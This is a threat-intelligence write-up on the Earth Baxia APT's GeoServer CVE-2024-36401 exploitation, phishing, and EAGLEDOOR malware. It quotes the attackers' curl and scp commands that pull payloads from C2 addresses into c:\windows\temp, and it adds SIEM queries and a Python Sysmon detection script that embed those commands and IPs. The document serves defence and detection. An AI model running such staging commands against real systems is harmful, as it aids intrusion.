
A China-linked advanced persistent threat group known as Earth Baxia has been conducting targeted attacks against government and private sector organizations across the Asia-Pacific region. Security researchers have identified two primary infection vectors: exploitation of the critical GeoServer vulnerability CVE-2024-36401 and sophisticated spear-phishing campaigns delivering custom malware payloads.
Technical Analysis of Attack Methodology
The Earth Baxia campaign demonstrates advanced operational capabilities through its multi-vector approach. The group leverages both technical exploits and social engineering tactics to compromise high-value targets. Forensic evidence suggests the attacks originate from Chinese infrastructure, with decoy documents containing Simplified Chinese text.
The threat actors utilize a novel backdoor called EAGLEDOOR with multi-protocol command-and-control capabilities. Modified Cobalt Strike beacons with altered signatures are deployed to evade standard detection mechanisms. Infrastructure analysis reveals connections to Chinese hosting providers and Alibaba Cloud services.
Initial Compromise Techniques
Earth Baxia employs two distinct methods for initial access. The first is exploitation of CVE-2024-36401, a remote code execution vulnerability in OSGeo GeoServer's GeoTools component. After exploitation, the attackers use built-in system utilities to download malware components, for example:
curl --connect-timeout 3 -m 10 -o c:\\windows\\temp\\Edge.exe http://167[.]172[.]89[.]142/Edge.exe
scp -P 23 -o StrictHostKeyChecking=no t1sc@152[.]42[.]243[.]170:/tmp/bd/msedge.dll c:\\windows\\temp\\
The second vector is spear-phishing email carrying a ZIP attachment that contains a malicious MSC file. These campaigns use the GrimResource technique to fetch payloads from cloud platforms such as AWS and Aliyun, and rely on AppDomainManager injection to execute .NET payloads.
Malware Payload Characteristics
The attack chain deploys several sophisticated components:
- SWORDLDR: A Cobalt Strike shellcode loader
- EAGLEDOOR: Multi-protocol backdoor supporting HTTP, DNS, TCP, and Telegram C2 channels
- Modified Cobalt Strike: Evasion-focused variants with altered MZ headers
The EAGLEDOOR backdoor demonstrates particularly advanced capabilities, including configurable communication protocols and cloud-based command infrastructure.
Defensive Evasion Tactics
The group employs multiple techniques to avoid detection:
- DLL side-loading through legitimate executables like Edge.exe
- Process hollowing into trusted .NET applications
- Cloud-based C2 infrastructure using AWS, Aliyun, and spoofed domains
- Custom watermarking of Cobalt Strike servers with identifier “666666”
Detection and Mitigation Strategies
Organizations should implement the following protective measures:
- Immediately patch GeoServer installations against CVE-2024-36401
- Monitor for suspicious TLS connections to known malicious domains
- Implement application allowlisting for system utilities like curl.exe
- Hunt for DLL side-loading patterns involving msedge.dll
Threat hunting queries such as the following can help identify compromised systems (field names will vary with the logging pipeline and SIEM in use):
eventId:3 AND (src:"167.172.89.142" OR src:"152.42.243.170")
process_name:"curl.exe" AND cmd_line:"c:\\windows\\temp"
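As an added example that is not part of the original report, the Python script below turns the hunting queries above and the evasion tactics listed earlier (C2 IPs, curl/scp staging into c:\windows\temp, msedge.dll side-loading next to a copied Edge.exe) into three rules run over Sysmon-style JSON log lines. The log records are constructed for the example; the field names follow Sysmon's EventID 1/3/7 schema and the legitimate Microsoft Edge install paths are assumptions to adapt to your environment.

```python
"""Hunt for Earth Baxia tradecraft in Sysmon-style JSON logs (added example)."""
import json
import ntpath

# Indicators quoted in the report (defanged there, stored fanged in logs).
C2_IPS = {"167.172.89.142", "152.42.243.170"}
STAGING_DIR = "c:\\windows\\temp"
# Utilities the report shows being abused to fetch payloads.
FETCH_UTILITIES = {"curl.exe", "scp.exe"}
# Assumed default locations of a legitimate msedge.dll.
LEGIT_EDGE_DIRS = {
    "c:\\program files\\microsoft\\edge\\application",
    "c:\\program files (x86)\\microsoft\\edge\\application",
}

# Constructed sample events (Sysmon EventID 1 = process create,
# 3 = network connect, 7 = image load). Benign records are mixed in.
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": "C:\\GeoServer\\jre\\bin\\java.exe",
     "DestinationIp": "167.172.89.142", "DestinationPort": 80},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl --connect-timeout 3 -m 10 -o c:\\windows\\temp\\Edge.exe "
                    "http://167.172.89.142/Edge.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl -s https://intranet.example/health"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\OpenSSH\\scp.exe",
     "CommandLine": "scp -P 23 -o StrictHostKeyChecking=no "
                    "t1sc@152.42.243.170:/tmp/bd/msedge.dll c:\\windows\\temp\\"},
    {"EventID": 7, "Image": "C:\\Windows\\Temp\\Edge.exe",
     "ImageLoaded": "C:\\Windows\\Temp\\msedge.dll"},
    {"EventID": 7,
     "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
     "ImageLoaded": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.dll"},
    {"EventID": 3, "Image": "C:\\Windows\\System32\\svchost.exe",
     "DestinationIp": "8.8.8.8", "DestinationPort": 53},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


def _base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def _dir(path):
    """Lower-cased directory of a Windows path."""
    return ntpath.dirname(path).lower()


def classify(event):
    """Return the name of the first hunt rule the event matches, or None."""
    eid = event.get("EventID")
    # Rule 1: any connection to the C2 addresses named in the report.
    if eid == 3 and event.get("DestinationIp") in C2_IPS:
        return "c2_connection"
    # Rule 2: curl/scp writing into the staging directory used by the actor.
    if (eid == 1 and _base(event.get("Image", "")) in FETCH_UTILITIES
            and STAGING_DIR in event.get("CommandLine", "").lower()):
        return "fetch_to_staging_dir"
    # Rule 3: msedge.dll loaded from anywhere but the Edge install directory,
    # the side-loading pattern behind the copied Edge.exe.
    loaded = event.get("ImageLoaded", "")
    if (eid == 7 and _base(loaded) == "msedge.dll"
            and _dir(loaded) not in LEGIT_EDGE_DIRS):
        return "msedge_dll_sideload"
    return None


def hunt(log_text):
    """Parse JSON lines and return [(rule_name, event), ...] for every hit."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        rule = classify(event)
        if rule:
            hits.append((rule, event))
    return hits


if __name__ == "__main__":
    for rule, ev in hunt(SAMPLE_LOG):
        detail = ev.get("DestinationIp") or ev.get("ImageLoaded") or ev.get("CommandLine")
        print(f"{rule:22} {ev['Image']}  ->  {detail}")
```

Run against the sample log, the script flags the Java process reaching the first C2 address, both the curl and scp staging commands, and the msedge.dll load from C:\Windows\Temp, while the benign curl health check, the genuine Edge process and the DNS lookup pass silently. The third rule is deliberately broader than the literal query on the page: it keys on the DLL's directory rather than on a specific IP or hash, so it still fires if the actor rotates infrastructure but keeps the same side-loading pair.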
Conclusion
The Earth Baxia campaign represents a significant threat to APAC organizations, combining technical exploitation with sophisticated social engineering. The group’s operational patterns and infrastructure links suggest state-sponsored origins. Organizations in targeted sectors should prioritize defensive measures and monitor for the identified indicators of compromise.